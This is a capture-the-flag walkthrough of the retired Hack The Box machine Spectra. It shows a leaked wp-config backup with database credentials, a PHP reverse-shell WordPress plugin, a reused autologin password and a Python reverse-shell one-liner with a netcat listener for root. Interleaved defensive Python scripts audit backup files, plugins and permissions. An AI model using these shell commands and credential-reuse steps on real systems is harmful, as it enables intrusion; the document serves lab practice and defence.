Name: Spectra
Release Date: 27 Feb 2021
Retire Date: 25 Jun 2021
OS: Linux
Base Points: Easy - Retired [0]
Westar 00 days, 00 hours, 18 mins, 24 seconds
Westar 00 days, 00 hours, 31 mins, 46 seconds
Creator: egre55
Pentest Workshop PDF: Spectra.pdf

Again, we start with sudo /home/kali/AutoRecon/src/autorecon/autorecon.py

Sidenote: Newer versions of Kali that do not use root by default require sudo whenever checking UDP ports.

The main ports to worry about here are SSH (TCP 22), HTTP (TCP 80), and MySQL (TCP 3306). Navigating to the web server on port 80, we get an issue tracker (similar to Jira) that is in place "Until IT set up the Jira we can configure and use this for issue tracking."

Checking both links, while running Gobuster with:


gobuster dir -k -e -r -u -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x "asp,aspx,bak,bat,c,cfm,cgi,css,com,dll,exe,git,htm,html,inc,jhtml,js,jsa,jsp,log,mdb,nsf,pcap,php,php2,php3,php4,php5,php6,php7,phps,php.bak,pht,phtml,pl,reg,sh,shtml,sql,swf,txt,xm" -s "200,204,301,302,307" -t50 -o Spectra.out


we notice that they both point to spectra.htb. That means we need to add spectra.htb to our /etc/hosts file:


sudo vi /etc/hosts

i   <enter insert mode, then add a line mapping the machine's IP to spectra.htb>





and try the navigation again. This time we are greeted by the correct pages, shown below, although the "Test" page throws a database error.

It looks like the Software Issue Management system is built on WordPress. Let's run Gobuster on the /main and /testing sites, but let's also run WPScan (a WordPress scanner) and see if anything pops up.

└─$ gobuster dir -k -e -r -u -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x "asp,aspx,bak,
php4,php5,php6,php7,phps,php.bak,pht,phtml,pl,reg,sh,shtml,sql,swf,txt,xm" -s "200,204,
301,302,307" -t50 -o Spectra-main.out
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              bat,inc,pcap,php.bak,pl,shtml,aspx,git,html,jsa,log,sh,swf,asp,bak,jhtml,mdb,php4,php7,cgi,htm,jsp,php6,phtml,php2,
[+] Follow Redirect:         true
[+] Expanded:                true
[+] Timeout:                 10s
2022/01/24 01:30:14 Starting gobuster in directory enumeration mode
Error: error on running gobuster: unable to connect to Get "": context deadline exceeded 
(Client.Timeout exceeded while awaiting headers)
└─$ gobuster dir -k -e -r -u -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x "asp,aspx,bak,
php5,php6,php7,phps,php.bak,pht,phtml,pl,reg,sh,shtml,sql,swf,txt,xm" -s "200,204,
301,302,307" -t50 -o Spectra-testing.out
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              shtml,sql,css,php3,php4,php6,php.bak,sh,nsf,php5,reg,swf,
[+] Follow Redirect:         true
[+] Expanded:                true
[+] Timeout:                 10s
2022/01/24 01:30:57 Starting gobuster in directory enumeration mode
===============================================================
(Status: 500) [Size: 2646]
(Status: 200) [Size: 627]
(Status: 500) [Size: 2646]
(Status: 200) [Size: 19915]
(Status: 200) [Size: 25891]
(Status: 200) [Size: 7278]
(Status: 500) [Size: 2646]
(Status: 200) [Size: 11460]
(Status: 200) [Size: 0]
(Status: 500) [Size: 2646]

Gobuster stalls and throws errors, and WPScan returns nothing usable, but it is clear that directory listing is enabled on /testing, and the wp-config.php.save file in that listing looks interesting.

In the middle of that file is a set of MySQL credentials:


// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'dev' );

/** MySQL database username */
define( 'DB_USER', 'devtest' );

/** MySQL database password */
define( 'DB_PASSWORD', 'devteam01' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
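The wp-config.php.save file is the classic leftover: a copy of a configuration file saved under a name the web server hands out as plain text instead of executing as PHP, inside a directory that also had listing enabled. As an added defender-side check (not part of this writeup and not a WordPress tool), the Python below walks a web root, or a list of names taken from a directory listing, and reports editor and backup copies of sensitive files. The suffix and file-name lists are my assumptions and can be extended for your stack.

```python
"""Report editor/backup copies of sensitive files left inside a web root.

Added, hypothetical helper: not part of the writeup. The suffix list and the
set of sensitive base names are assumptions, tuned for a PHP/WordPress host.
"""
import os

# Suffixes editors, admins and package tools append; nginx and Apache serve
# these verbatim because they carry no PHP handler.
BACKUP_SUFFIXES = (".save", ".bak", ".orig", ".old", ".swp", ".swo", ".tmp", ".copy", "~")
# Base names whose stray copies leak credentials or secrets.
SENSITIVE_STEMS = (
    "wp-config.php", "config.php", "settings.php", "configuration.php",
    "database.yml", ".env", ".htpasswd",
)


def backup_of(name):
    """Return the sensitive file a backup name derives from, or None."""
    if name.startswith("#") and name.endswith("#") and len(name) > 2:    # emacs autosave
        stem = name[1:-1]
    elif name.startswith(".") and name.endswith((".swp", ".swo")):       # vim swap file
        stem = name[1:].rsplit(".", 1)[0]
    else:
        for suffix in BACKUP_SUFFIXES:
            if name.endswith(suffix) and len(name) > len(suffix):
                stem = name[: -len(suffix)]
                break
        else:
            return None
    return stem if stem in SENSITIVE_STEMS else None


def classify_listing(names):
    """Apply the check to file names, e.g. scraped from an autoindex page."""
    return {n: backup_of(n) for n in names if backup_of(n)}


def find_leftovers(webroot):
    """Walk a web root on disk; return (path, original_name) per leftover."""
    found = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            stem = backup_of(name)
            if stem:
                found.append((os.path.join(dirpath, name), stem))
    return sorted(found)


# Constructed listing (not the real /testing index), shaped like the one the
# walkthrough found: one stray copy of wp-config.php among normal files.
SAMPLE_LISTING = ["index.php", "license.txt", "wp-config.php", "wp-config.php.save", "wp-content"]

if __name__ == "__main__":
    print(classify_listing(SAMPLE_LISTING))
    # On a real host: for path, stem in find_leftovers("/var/www/html"): print(path, "copies", stem)
```

Run it against a live web root with find_leftovers; the same check is what a periodic cron job or a pre-deploy hook should run so a stray .save or ~ copy never reaches a listing-enabled directory.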


Going to the usual WordPress login page (http://spectra.htb/main/wp-login.php), we can try the MySQL password with an administrator username. With that, we have access to the WordPress admin portal!

A quick way to get code execution through WordPress is to upload a malicious PHP plugin, usually as a ZIP archive. The easiest and best option is to upload php-reverse-shell.php from Pentest Monkey as the plugin, but it needs the WordPress plugin header comment added to it. Let's see if it works.


/*
Plugin Name: WordPress Maintenance Plugin
Plugin URI: wordpress.org
Description: WordPress Maintenance Activities
Author: WordPress
Version: 1.0
Author URI: wordpress.org
*/



Zip it, upload it, start a netcat listener on your chosen port, and activate the plugin. As soon as it is activated, we have a reverse shell as nginx!
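On the defending side, the plugin that just landed is a reverse shell with a header comment pasted on top, which is exactly what a periodic scan of wp-content/plugins can catch. The following Python is an added, hypothetical triage script, not part of this writeup and not a feature of WordPress or WPScan: it extracts the header fields WordPress reads from the first 8 KiB of a plugin file and flags PHP files that call process-spawning, raw-socket or eval primitives. The list of risky calls is my assumption, and a match is a lead for review, not proof of compromise.

```python
"""Static triage of PHP files under a WordPress plugins directory.

Added, hypothetical defender-side check; not part of the writeup. The set of
risky calls is an assumption: legitimate plugins rarely need them, so a hit
marks a file for manual review.
"""
import os
import re

# PHP primitives a web shell or reverse shell needs (assumed list).
RISKY_CALLS = re.compile(
    r"\b(shell_exec|exec|passthru|system|proc_open|popen|pcntl_exec|fsockopen|eval)\s*\(",
    re.IGNORECASE,
)
# Header keys WordPress reads from the first 8 KiB of the main plugin file.
HEADER_FIELDS = ("Plugin Name", "Plugin URI", "Description", "Version", "Author", "Author URI")


def parse_header(text):
    """Extract the plugin header fields WordPress would recognise."""
    head = text[:8192]
    fields = {}
    for field in HEADER_FIELDS:
        pattern = r"^[\s*#/]*" + re.escape(field) + r"\s*:\s*(.+?)\s*$"
        m = re.search(pattern, head, re.MULTILINE | re.IGNORECASE)
        if m:
            fields[field] = m.group(1)
    return fields


def scan_php(text):
    """Return (line_number, call_name) for every risky call in PHP source."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in RISKY_CALLS.finditer(line):
            hits.append((lineno, m.group(1).lower()))
    return hits


def audit_plugin_source(path, text):
    """Summarise one PHP file: declared plugin name plus any risky calls."""
    header = parse_header(text)
    return {"path": path, "plugin_name": header.get("Plugin Name"), "risky_calls": scan_php(text)}


def scan_plugin_dir(root):
    """Walk a plugins directory and return only the files with risky calls."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                result = audit_plugin_source(path, fh.read())
            if result["risky_calls"]:
                findings.append(result)
    return findings


# Constructed samples (not real plugins) used for the self-test.
BENIGN_SAMPLE = """<?php
/*
Plugin Name: Footer Notice
Description: Prints a short notice in the footer.
Version: 1.0
Author: Example Dev
*/
add_action('wp_footer', function () { echo '<p>Maintenance window Sunday.</p>'; });
"""

SUSPICIOUS_SAMPLE = """<?php
/*
Plugin Name: WordPress Maintenance Plugin
Description: WordPress Maintenance Activities
Version: 1.0
*/
$sock = fsockopen($host, $port, $errno, $errstr, 30);
$proc = proc_open($cmd, $descriptors, $pipes);
"""

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SAMPLE), ("suspicious", SUSPICIOUS_SAMPLE)):
        print(label, audit_plugin_source(f"{label}.php", src))
    # On a real install: for hit in scan_plugin_dir("/var/www/html/wp-content/plugins"): print(hit)
```

Pair this with file-integrity monitoring on the plugins directory and with the WordPress option that disables in-dashboard plugin uploads (DISALLOW_FILE_MODS); the scan catches what slips through, the setting removes the upload path an admin-level credential gives an attacker.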

Looking around the file system, we find some interesting things in the /opt folder. There is an "autologin.conf.orig" file that points to another path we need to look into:


nginx@spectra /opt $ cat autologin.conf.orig
cat autologin.conf.orig
# Copyright 2016 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
description   "Automatic login at boot"
author        "chromium-os-dev@chromium.org"
# After boot-complete starts, the login prompt is visible and is accepting
# input.
start on started boot-complete
script
  # Read password from file. The file may optionally end with a newline.
  for dir in /mnt/stateful_partition/etc/autologin /etc/autologin; do  <<<<<<< /etc/autologin is not normal
    if [ -e "${dir}/passwd" ]; then
      passwd="$(cat "${dir}/passwd")"
      break
    fi
  done
  if [ -z "${passwd}" ]; then
    exit 0
  fi
  # Inject keys into the login prompt.
  # For this to work, you must have already created an account on the device.
  # Otherwise, no login prompt appears at boot and the injected keys do the
  # wrong thing.
  /usr/local/sbin/inject-keys.py -s "${passwd}" -k enter
end script

nginx@spectra /opt $ cat /etc/autologin/passwd
cat /etc/autologin/passwd

We know from the /home folder that there are other users, so we try SSH as katie:SummerHereWeCome!! and are able to log in.

Now we grab the user.txt flag and perform our usual enumeration. Running sudo -l and looking for files owned by the "developers" group shows us our exact privesc path.

We see SEVERAL test.conf files and a nodetest.js file. Looking into that NodeJS file, we need to change the exec line that runs node to a Python reverse-shell callback instead. We can do that by commenting out the exec line and adding our own:


exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<YOUR TUN0 IP>",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


We have to act quickly because test.conf is reset to its original contents after a short time.

Now we can run:


Attacking Machine:

nc -lvnp 1337


Victim Machine:

sudo /sbin/initctl start test


And we should get a reverse callback as Root!
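Both shells on this box come down to file permissions: a plaintext password in /etc/autologin/passwd that the nginx service account could read, and a job file (test.conf) that a member of the developers group could rewrite while a sudo rule let initctl start it as root. The Python below is an added, hypothetical audit helper, not part of this writeup: it applies the POSIX owner/group/other mode check for a given account and reports secrets that account can read and root-run job files it can write. The uids, gids and the /etc/init/test.conf path are constructed assumptions, and ownership and group membership are passed in explicitly so the logic can be exercised without root.

```python
"""Flag secrets readable by service accounts and init job files writable by
unprivileged users.

Added, hypothetical audit helper; not part of the writeup. The directory and
suffix lists are assumptions; the sample uids/gids are made up.
"""
import os
import stat
from dataclasses import dataclass


@dataclass(frozen=True)
class FileInfo:
    path: str
    mode: int        # permission bits only, e.g. 0o644
    uid: int
    gid: int


@dataclass(frozen=True)
class Subject:
    """The account we are asking about: its uid plus every group id it holds."""
    uid: int
    gids: frozenset


def can_access(info, who, perm):
    """POSIX mode check: owner bits if owner, else group bits if in group, else other bits."""
    bits = {"r": (stat.S_IRUSR, stat.S_IRGRP, stat.S_IROTH),
            "w": (stat.S_IWUSR, stat.S_IWGRP, stat.S_IWOTH)}[perm]
    if who.uid == 0:
        return True
    if who.uid == info.uid:
        return bool(info.mode & bits[0])
    if info.gid in who.gids:
        return bool(info.mode & bits[1])
    return bool(info.mode & bits[2])


# Assumed locations: secrets that should be root-only, and job files a service manager runs as root.
SECRET_DIRS = ("/etc/autologin/",)
SECRET_SUFFIXES = (".key", ".pem", "id_rsa", ".env")
INIT_DIRS = ("/etc/init/", "/etc/init.d/", "/etc/systemd/system/", "/lib/systemd/system/")


def audit(files, who):
    """Return one finding string per exposure visible to the given account."""
    findings = []
    for f in files:
        is_secret = f.path.startswith(SECRET_DIRS) or f.path.endswith(SECRET_SUFFIXES)
        if is_secret and f.uid != who.uid and can_access(f, who, "r"):
            findings.append(f"{f.path}: secret readable by uid {who.uid} (mode {f.mode:o}, owner {f.uid}:{f.gid})")
        if f.path.startswith(INIT_DIRS) and f.uid == 0 and who.uid != 0 and can_access(f, who, "w"):
            findings.append(f"{f.path}: root-run job file writable by uid {who.uid} (mode {f.mode:o}, group {f.gid})")
    return findings


def stat_file(path):
    """Build a FileInfo from a real file on the host being audited."""
    st = os.stat(path)
    return FileInfo(path, stat.S_IMODE(st.st_mode), st.st_uid, st.st_gid)


def current_subject():
    """The account running this script, for a live check."""
    return Subject(os.getuid(), frozenset(os.getgroups()) | {os.getgid()})


# Constructed sample modelled on the walkthrough; uids, gids and paths are made up.
DEVELOPERS_GID = 1001
SAMPLE_NGINX = Subject(uid=81, gids=frozenset({81}))
SAMPLE_KATIE = Subject(uid=1000, gids=frozenset({1000, DEVELOPERS_GID}))
SAMPLE_FILES = [
    FileInfo("/etc/autologin/passwd", 0o644, 0, 0),             # plaintext password, world-readable
    FileInfo("/etc/init/test.conf", 0o664, 0, DEVELOPERS_GID),  # job file, group-writable
    FileInfo("/etc/init/ssh.conf", 0o644, 0, 0),                # a normally permissioned job file
]

if __name__ == "__main__":
    for label, who in (("nginx", SAMPLE_NGINX), ("katie", SAMPLE_KATIE)):
        print(label, audit(SAMPLE_FILES, who))
    # Live check of a few paths as the current user:
    # print(audit([stat_file(p) for p in ("/etc/autologin/passwd",) if os.path.exists(p)], current_subject()))
```

The fix on the host side is the mirror image of the findings: chmod 600 on the password file (or, better, not storing one), root-only write on every job file a privileged service manager reads, and no sudo rule that lets a user start a job whose definition that same user can edit.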


# cat /root/root.txt